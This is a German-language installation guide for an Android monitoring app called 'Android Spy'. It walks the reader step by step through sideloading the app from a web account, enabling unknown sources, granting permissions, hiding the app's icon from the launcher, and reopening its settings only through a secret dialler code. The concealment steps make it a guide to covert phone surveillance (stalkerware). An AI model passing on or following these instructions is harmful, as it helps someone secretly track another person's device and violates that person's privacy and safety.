Anleitung zur Installation von Android Spy

1. Starten Sie den Internet Browser auf dem Gerät.
2. Rufen Sie die URL https://run.a-spy.com auf.
3. Bitte geben Sie die Email-Adresse und das Passwort des Kontos an, welches Sie auf https://run.a-spy.com erstellt haben. Tippen Sie auf «Anmelden».
4. Tippen Sie auf «Navigation». Falls Sie ein größeres Display besitzen, fahren Sie mit dem nächsten Schritt fort.
5. Tippen Sie auf «Download».
6. Tippen Sie auf «Download» und laden die Applikation herunter.
7. Öffnen Sie das Benachrichtigungsfeld und tippen Sie auf den abgeschlossenen Download.
8. Tippen Sie auf «Einstellungen».
9. Tippen Sie auf «Unbekannte Quellen».
10. Tippen Sie auf «OK».
11. Tippen Sie auf «Weiter».
12. Tippen Sie auf «Installieren».
13. Tippen Sie auf «Öffnen».
14. Tippen Sie auf «Annehmen».
15. Bitte geben Sie die Email-Adresse und das Passwort des Kontos an, welches Sie auf https://run.a-spy.com erstellt haben. Tippen Sie auf «OK».
16. Tippen Sie auf «OK».
17. Nun können Sie das Symbol im Launcher ausblenden.
18. Tippen Sie auf «Schließen», wenn Sie keine weiteren Einstellungen vornehmen möchten.
19. Um die Einstellungen wieder zu öffnen, starten Sie die Telefon-Applikation.
20. Geben Sie die Telefonnummer ein, die in den Einstellungen festgelegt wurde und tippen auf «Anrufen». Die Telefonnummer ist voreingestellt: 0000. Falls Sie diese Telefonnummer nicht mehr wissen, finden Sie diese auf https://run.a-spy.com unter «Geräte».